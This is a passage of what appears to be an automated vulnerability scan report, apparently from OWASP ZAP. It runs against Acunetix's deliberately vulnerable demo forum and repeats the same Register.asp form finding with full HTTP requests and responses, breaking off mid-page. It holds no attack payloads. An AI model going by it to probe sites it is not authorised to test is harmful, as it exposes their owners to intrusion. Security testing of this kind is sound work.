applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=41 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=42 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=43 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=44 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=45 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=46 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=48 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable 